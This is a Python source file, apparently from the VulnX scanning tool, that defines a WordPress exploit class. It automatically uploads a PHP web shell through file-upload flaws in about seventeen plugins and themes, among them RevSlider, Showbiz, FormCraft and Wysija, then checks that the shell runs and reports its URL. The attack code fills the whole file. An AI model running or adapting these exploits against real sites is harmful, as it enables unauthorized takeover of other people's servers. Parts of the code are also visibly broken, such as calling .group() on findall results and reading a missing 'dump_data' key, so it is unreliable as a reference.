
from __future__ import (absolute_import, division, print_function)
from common.colors import failexploit, vulnexploit, que, info, good,run,W

import re
import random
import datetime
import requests
import os

now = datetime.datetime.now()
year = now.strftime('%Y')
month = now.strftime('%m')


class WPExploits():

    def __init__(self, url, headers):
        self.url = url
        self.headers = headers

    def wp_blaze(self):
        self.headers['Content_Type'] = 'multipart/form-data'
        regex = re.compile(r'\/uploads\/blaze\/(.*?)\/big\/VulnX.php')
        options = {
            'album_img': [open('shell/VulnX.php', 'rb')],
            'task': 'blaze_add_new_album',
            'album_name': '',
            'album_desc': ''
        }
        endpoint = self.url + "/wp-admin/admin.php?page=blaze_manage"
        content = requests.post(endpoint, data=options, headers=self.headers,verify=False).text
        check_blaze = re.findall(regex, content)
        if check_blaze:
            uploadfolder = check_blaze.group(1)
            dump_data = self.url + "/wp-content/uploads/blaze/"+uploadfolder+"/big/VulnX.php?Vuln=X"
            return dict(
                url=self.url,
                name="Blaze SlideShow ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Blaze SlideShow ",
                status=False
            )

    def wp_catpro(self):
        regex = re.compile(r'\/uploads\/blaze\/(.*?)\/big\/VulnX.php')
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'album_img': [open('shell/VulnX.php', 'rb')],
            'task': 'cpr_add_new_album',
            'album_name': '',
            'album_desc': ''
        }
        endpoint = self.url + "/wp-admin/admin.php?page=catpro_manage"
        content = requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        check_catpro = re.findall(regex, content)
        if check_catpro:
            uploadfolder = check_catpro.group(1)
            dump_data = self.url + "/wp-content/uploads/catpro/"+uploadfolder+"/big/VulnX.php?Vuln=X"
            return dict(
                url=self.url,
                name="Catpro   ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Catpro         ",
                status=False
            )

    def wp_cherry(self):
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'file': open('shell/VulnX.php', 'rb')
        }
        endpoint = self.url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
        requests.post(endpoint, data=options,headers=self.headers,verify=False)
        dump_data = self.url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
        content = requests.get(dump_data,headers=self.headers,verify=False).text
        check_cherry = re.findall("Vuln X", content)
        if check_cherry:
            return dict(
                url=self.url,
                name="CherryFramework ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="CherryFramework ",
                status=False
            )

    def wp_dm(self):
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'upfile': open('shell/VulnX.php', 'rb'),
            'dm_upload': ''
        }
        requests.post(self.url, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
        content = requests.get(dump_data,headers=self.headers,verify=False).text
        check_dm = re.findall("Vuln X", content)
        if check_dm:
            return dict(
                url=self.url,
                name="Download Manager ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Download Manager ",
                status=False
            )

    def wp_powerzoomer(self):
        regex = r'\/uploads\/powerzoomer\/(.*?)\/big\/VulnX.php'
        endpoint = self.url + "/wp-admin/admin.php?page=powerzoomer_manage"
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'album_img': [open('shell/VulnX.php', 'rb')],
            'task': 'pwz_add_new_album',
            'album_name': '',
            'album_desc': ''
        }
        response = requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        check_powerzoomer = re.findall(regex, response)
        if check_powerzoomer:
            uploadfolder = check_powerzoomer.group(1)
            dump_data = self.url + "/wp-content/uploads/powerzoomer/" + uploadfolder+"/big/VulnX.php?Vuln=X"
            return dict(
                url=self.url,
                name="PowerZoom      ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="PowerZoom       ",
                status=False
            )

    def wp_revslider(self):
        endpoint = self.url + "/wp-admin/admin-ajax.php"
        self.headers = {
            'Cookie': '',
            'Content_Type': 'form-data',
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
        }
        options = {
            'action': 'revslider_ajax_action',
            'client_action': 'update_plugin',
            'update_file': [open('shell/VulnX.zip', 'rb')]
        }
        requests.post(endpoint, data=options,headers=self.headers,verify=False)
        revslidera = requests.post(
            self.url+"/wp-content/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderb = requests.get(
            self.url+"/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderc = requests.get(
            self.url+"/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderd = requests.get(
            self.url+"/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revslidere = requests.get(
            self.url+"/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslid.texter/VulnX.php", self.headers).text
        revsliderf = requests.get(
            self.url+"/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderg = requests.get(
            self.url+"/wp-content/themes/centum/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderh = requests.get(
            self.url+"/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revslideri = requests.get(
            self.url+"/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderj = requests.get(
            self.url+"/wp-content/themes/pindol/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderk = requests.get(
            self.url+"/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderl = requests.get(
            self.url+"/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderm = requests.get(
            self.url+"/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        check_revslidera = re.findall("Vuln X", revslidera)
        check_revsliderb = re.findall("Vuln X", revsliderb)
        check_revsliderc = re.findall("Vuln X", revsliderc)
        check_revsliderd = re.findall("Vuln X", revsliderd)
        check_revslidere = re.findall("Vuln X", revslidere)
        check_revsliderf = re.findall("Vuln X", revsliderf)
        check_revsliderg = re.findall("Vuln X", revsliderg)
        check_revsliderh = re.findall("Vuln X", revsliderh)
        check_revslideri = re.findall("Vuln X", revslideri)
        check_revsliderj = re.findall("Vuln X", revsliderj)
        check_revsliderk = re.findall("Vuln X", revsliderk)
        check_revsliderl = re.findall("Vuln X", revsliderl)
        check_revsliderm = re.findall("Vuln X", revsliderm)
        dump_data = ""
        if check_revslidera:
            return dict(
                url=self.url,
                name="revslidera     ",
                status=True,
                shell=dump_data
            )

        elif check_revsliderb:
            return dict(
                url=self.url,
                name="revsliderb",
                status=True,
                shell=dump_data
            )

        elif check_revsliderc:
            return dict(
                url=self.url,
                name="revsliderc",
                status=True,
                shell=dump_data
            )

        elif check_revsliderd:
            return dict(
                url=self.url,
                name="revsliderd",
                status=True,
                shell=dump_data
            )

        elif check_revslidere:
            return dict(
                url=self.url,
                name="revslidere",
                status=True,
                shell=dump_data
            )

        elif check_revsliderf:
            return dict(
                url=self.url,
                name="revsliderf",
                status=True,
                shell=dump_data
            )

        elif check_revsliderg:
            return dict(
                url=self.url,
                name="revsliderg",
                status=True,
                shell=dump_data
            )

        elif check_revsliderh:
            return dict(
                url=self.url,
                name="revsliderh",
                status=True,
                shell=dump_data
            )

        elif check_revslideri:
            return dict(
                url=self.url,
                name="revslideri",
                status=True,
                shell=dump_data
            )

        elif check_revsliderj:
            return dict(
                url=self.url,
                name="revsliderj",
                status=True,
                shell=dump_data
            )

        elif check_revsliderk:
            return dict(
                url=self.url,
                name="revsliderk",
                status=True,
                shell=dump_data
            )

        elif check_revsliderl:
            return dict(
                url=self.url,
                name="revsliderl",
                status=True,
                shell=dump_data
            )

        elif check_revsliderm:
            return dict(
                url=self.url,
                name="revsliderm",
                status=True,
                shell=dump_data
            )

        else:
            return dict(
                url=self.url,
                name="Revsmoder      ",
                status=False
            )

    def wp_fromcraft(self):
        shell = open('shell/VulnX.php', 'rb')
        fields = "files[]"
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            fields: shell
        }
        endpoint = self.url + "/wp-content/plugins/formcraft/file-upload/server/php/"
        response = requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/plugins/formcraft/file-upload/server/php/files/VulnX.php?Vuln=X"
        check_fromcraft = re.findall("\"files", response)
        if check_fromcraft:
            return dict(
                url=self.url,
                name=" Formcraft       ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Formcrafts      ",
                status=False
            )

    def wp_jobmanager(self):
        regex = re.compile(r'image\/gif')
        endpoint = self.url + "/jm-ajax/upload_file/"
        image = open('shell/VulnX.gif', 'rb')
        field = "file[]"
        self.headers['content-type'] = 'multipart/form-data'
        options = {
            field: image
        }
        self.headers['Content_Type'] = 'multipart/form-data'
        requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/uploads/job-manager-uploads/file/" + \
            year+"/"+month+"/VulnX.gif"
        response = requests.get(dump_data,headers=self.headers,verify=False)
        res = response.headers['content-type']
        check_jobmanager = re.findall(regex, res)
        if check_jobmanager:
            return dict(
                url=self.url,
                name="Job Manager    ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Job Manager     ",
                status=False
            )

    # Showbiz Pro
    def wp_showbiz(self):
        endpoint = self.url + "/wp-admin/admin-ajax.php"
        def random_UserAgent():
            useragents_rotate = [
                "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
                "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
                "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
                "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
                "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
                "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
            ]
            useragents_random = random.choice(useragents_rotate)
            return useragents_random
        useragent = random_UserAgent()
        self.headers['User-Agent'] = useragent
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            "action": "showbiz_ajax_action",
            "client_action": "update_plugin",
            "update_file": [open('shell/VulnX.php', 'rb')]
        }
        requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X"
        res = requests.get(dump_data, options).text
        check_showbiz = re.findall("Vuln X", res)
        if check_showbiz:
            return dict(
                url=self.url,
                name="Showbiz Pro    ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Showbiz Pro     ",
                status=False
            )

    def wp_synoptic(self):
        endpoint = self.url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
        shell = open('shell/VulnX.php', 'rb')
        field = "qqfile"
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            field: shell
        }
        requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        check_synoptic = re.findall("Vuln X", res)
        if check_synoptic:
            return dict(
                url=self.url,
                name="Synoptic        ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Synoptic         ",
                status=False
            )

    # WPshop eCommerce method
    def wp_shop(self):
        endpoint = self.url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
        shell = open('shell/VulnX.php', 'rb')
        field = "wpshop_file"
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            field: shell
        }
        requests.post(endpoint, data=options,headers=self.headers,verify=False)
        dump_data = self.url + "/wp-content/uploads/VulnX.php?Vuln=X"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        check_shop = re.findall("Vuln X", res)
        if check_shop:
            return dict(
                url=self.url,
                name="WP Shop         ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="WP Shop         ",
                status=False
            )

    # Simple Ads Manager
    def wp_adsmanager(self):
        endpoint = self.url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
        shell = open('shell/VulnX.php', 'rb')
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'uploadfile': shell,
            'action': 'upload_ad_image',
            'path': ''
        }
        requests.post(endpoint, data=options,headers=self.headers,verify=False)
        dump_data = self.url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        check_adsmanager = re.findall("{\"status\":\"success\"}", res)
        if check_adsmanager:
            return dict(
                url=self.url,
                name="Ads Manager    ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Ads Manager     ",
                status=False
            )

    # Wysija Newsletters
    def wp_wysija(self):
        endpoint = self.url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
        shell = open('shell/VulnX.php', 'rb')
        self.headers['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
        self.headers['Content_Type'] = 'form-data'
        options = {
            'theme': shell,
            'overwriteexistingtheme': 'on',
            'action': 'themeupload',
            'submitter': 'Upload'
        }
        requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        check_wysija = re.findall("Vuln X", res)
        if check_wysija:
            return dict(
                url=self.url,
                name="Wysija         ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Wysija         ",
                status=False
            )

    def wp_inboundiomarketing(self):
        endpoint = self.url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
        shell = open('shell/VulnX.php', 'rb')
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'file': shell,
        }
        requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        check_inboundiomarketing = re.findall("Vuln X", res)
        if check_inboundiomarketing:
            return dict(
                url=self.url,
                name="InBoundio Market",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="InBoundio Market",
                status=False
            )

    def wp_adblockblocker(self):
        endpoint = self.url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
        shell = open('shell/VulnX.php', 'rb')
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'popimg': shell,
        }
        requests.post(endpoint, data=options,headers=self.headers,verify=False)
        dump_data = self.url + "/wp-content/uploads/"+year+"/"+month+"/VulnX.php?Vuln=X"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        if re.findall("Vuln X", res):
            return dict(
                url=self.url,
                name="AdBlocker       ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="AdBlocker       ",
                status=False
            )

    def wp_levoslideshow(self):
        endpoint = self.url + "/wp-admin/admin.php?page=levoslideshow_manage"
        shell = open('shell/VulnX.php', 'rb')
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'album_img': shell,
            'task': 'lvo_add_new_album',
            'album_name': '',
            'album_desk': '',
        }
        send_shell = requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        check = re.findall(
            "/uploads/levoslideshow/(.*?)/big/VulnX.php/", send_shell)
        if check:
            dump_data = self.url + "/wp-content/uploads/levoslideshow/" + \
                check.group(1)+"/big/VulnX.php?Vuln=X"
            return dict(
                url=self.url,
                name="LevoSlider Show",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="LevoSlider Show",
                status=False
            )

    def wp_thumbnailSlider(self):
#        endpoint = self.url + "wp-admin/admin.php?page=responsive_thumbnail_slider_image_management"
        with open('shell/Vulnx.gif', 'rb') as img:
            name_img = os.path.basename('shell/Vulnx.gif')
            files = {
                'image': (name_img, img, 'multipart/form-data', {'Expires': '0'})}
            upload_file = requests.post(self.url, files=files,headers=self.headers,verify=False)
            fname = re.findall(re.compile(r'/slider\/(.*\.gif)/'), upload_file)
            if fname:
                dump_data = self.url + "wp-content/uploads/wp-responsive-images-thumbnail-slider/"+fname
                return dict(
                    url=self.url,
                    name="Thumbnail Slider",
                    status=True,
                    shell=dump_data
                )
            else:
                return dict(
                    url=self.url,
                    name="Thumbnail Slider",
                    status=False
                )

    def json_writer(self):
        print('json_export')

    def exploit_state(self,exploit):
        if (exploit['status']):
            print(' {0} {1} {2} {3}'.format(que,exploit['name'],vulnexploit,exploit['dump_data']))
        else:
            print(' {0} {1} \t\t {2}'.format(que,exploit['name'],failexploit))

    def wpexploits(self):
        self.exploit_state(self.wp_wysija())
        self.exploit_state(self.wp_blaze())
        self.exploit_state(self.wp_synoptic())
        self.exploit_state(self.wp_catpro())
        self.exploit_state(self.wp_cherry())
        self.exploit_state(self.wp_dm())
        self.exploit_state(self.wp_fromcraft())
        self.exploit_state(self.wp_jobmanager())
        self.exploit_state(self.wp_showbiz())
        self.exploit_state(self.wp_shop())
        self.exploit_state(self.wp_powerzoomer())
        self.exploit_state(self.wp_revslider())
        self.exploit_state(self.wp_adsmanager())
        self.exploit_state(self.wp_inboundiomarketing())
        self.exploit_state(self.wp_adblockblocker())
        self.exploit_state(self.wp_levoslideshow())